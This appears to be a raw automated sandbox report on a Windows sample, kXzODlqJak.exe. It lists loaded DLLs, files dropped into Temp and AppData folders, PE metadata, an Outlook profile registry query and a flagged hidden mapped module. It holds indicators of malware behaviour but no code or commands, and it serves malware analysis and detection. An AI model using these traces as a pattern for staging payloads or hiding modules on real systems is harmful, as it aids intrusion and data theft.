Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32Jump to behavior
Source: bfxggb.5.drLNK file: ..\..\..\..\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Source: kXzODlqJak.exeStatic file information: File size 14323584 > 1048576
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeFile opened: C:\Windows\TEMP\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcr100.dllJump to behavior
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: kXzODlqJak.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0@ source: RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1513682078.000000006C621000.00000020.00000001.01000000.0000000E.sdmp, RescueCDBurner.exe, 00000004.00000002.1575451197.000000006D4E1000.00000020.00000001.01000000.00000017.sdmp, RescueCDBurner.exe, 00000008.00000002.1845851673.000000006D6B1000.00000020.00000001.01000000.00000017.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, 00000003.00000002.1513883518.000000006C6E1000.00000020.00000001.01000000.0000000D.sdmp, RescueCDBurner.exe, 00000004.00000002.1575775399.000000006D5A1000.00000020.00000001.01000000.00000016.sdmp
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb source: kXzODlqJak.exe, 00000001.00000000.1458362168.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000000.1464490420.00000000001CE000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000002.1484896515.00000000001CE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb 0Jm source: kXzODlqJak.exe, 00000002.00000002.1486043148.000000006D491000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000003.00000002.1513161996.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1513361909.0000000009F50000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572080726.000000000A9F0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1567761052.000000000342E000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572388231.000000000ADAB000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1878041034.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877347727.0000000004697000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1843959169.0000000009DBF000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1844261418.000000000A4C1000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000003.00000002.1513161996.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1513361909.0000000009F50000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572080726.000000000A9F0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1567761052.000000000342E000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572388231.000000000ADAB000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1878041034.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877347727.0000000004697000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1843959169.0000000009DBF000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1844261418.000000000A4C1000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb> source: kXzODlqJak.exe, 00000001.00000000.1458362168.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000000.1464490420.00000000001CE000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000002.1484896515.00000000001CE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb source: kXzODlqJak.exe, 00000002.00000002.1486043148.000000006D491000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000003.00000002.1516266410.000000006D381000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000004.00000002.1576546170.000000006D7F1000.00000020.00000001.01000000.00000011.sdmp, RescueCDBurner.exe, 00000008.00000002.1846420137.00000000700A1000.00000020.00000001.01000000.00000011.sdmp
Source: kXzODlqJak.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: kXzODlqJak.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: kXzODlqJak.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: kXzODlqJak.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: kXzODlqJak.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D48530E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_6D48530E
Source: QtCore4.dll.2.drStatic PE information: real checksum: 0x283beb should be: 0x284aa4
Source: oeqwwe.5.drStatic PE information: real checksum: 0x26dceb should be: 0x26a793
Source: Ascidian.dll.2.drStatic PE information: real checksum: 0x77117 should be: 0x7ccd7
Source: QtCore4.dll.3.drStatic PE information: real checksum: 0x283beb should be: 0x284aa4
Source: qpfwaekftwavc.9.drStatic PE information: real checksum: 0x26dceb should be: 0x26a793
Source: StarBurn.dll.2.drStatic PE information: real checksum: 0xa4afa should be: 0xab76c
Source: StarBurn.dll.3.drStatic PE information: real checksum: 0xa4afa should be: 0xab76c
Source: kXzODlqJak.exeStatic PE information: section name: .didat
Source: kXzODlqJak.exeStatic PE information: section name: .wixburn
Source: kXzODlqJak.exe.1.drStatic PE information: section name: .didat
Source: kXzODlqJak.exe.1.drStatic PE information: section name: .wixburn
Source: LocalCtrl_alpha_v3.exe.5.drStatic PE information: section name: Shared
Source: oeqwwe.5.drStatic PE information: section name: .xdata
Source: oeqwwe.5.drStatic PE information: section name: sfdel
Source: qpfwaekftwavc.9.drStatic PE information: section name: .xdata
Source: qpfwaekftwavc.9.drStatic PE information: section name: sfdel
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_009AE000 push ss; ret 1_2_009AE01D
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_009AE02E push ss; ret 1_2_009AE01D
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 1_2_0097CAD3 push ecx; ret 1_2_0097CAE6
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001FE000 push ss; ret 2_2_001FE01D
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001FE07E push esi; retn 001Ch2_2_001FE081
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001FE076 push es; ret 2_2_001FE07D
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_001CCAD3 push ecx; ret 2_2_001CCAE6
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D444910 push ebp; retf 2_2_6D44491B
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D478405 push ecx; ret 2_2_6D478418
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D4747B4 push ecx; ret 2_2_6D4747C7
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C630CC5 push ecx; ret 3_2_6C630CD8
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C622D88 push eax; ret 3_2_6C622DA6
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeCode function: 3_2_6C63B658 push ecx; ret 3_2_6C63B66B
Source: msvcr100.dll.2.drStatic PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.2.drStatic PE information: section name: .text entropy: 6.9340411158815725
Source: msvcr100.dll.3.drStatic PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.3.drStatic PE information: section name: .text entropy: 6.9340411158815725
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtXml4.dllJump to dropped file
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\StarBurn.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtNetwork4.dllJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtCore4.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\qpfwaekftwavcJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtCore4.dllJump to dropped file
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcr100.dllJump to dropped file
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtXml4.dllJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\StarBurn.dllJump to dropped file
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtGui4.dllJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcr100.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\oeqwweJump to dropped file
Source: C:\Users\user\Desktop\kXzODlqJak.exeFile created: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeJump to dropped file
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtNetwork4.dllJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\Ascidian.dllJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtGui4.dllJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeJump to dropped file
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtXml4.dllJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtNetwork4.dllJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtCore4.dllJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\StarBurn.dllJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcr100.dllJump to dropped file
Source: C:\Users\user\Desktop\kXzODlqJak.exeFile created: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\Ascidian.dllJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtGui4.dllJump to dropped file
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\oeqwweJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\qpfwaekftwavcJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Found hidden mapped module (file has been removed from disk)
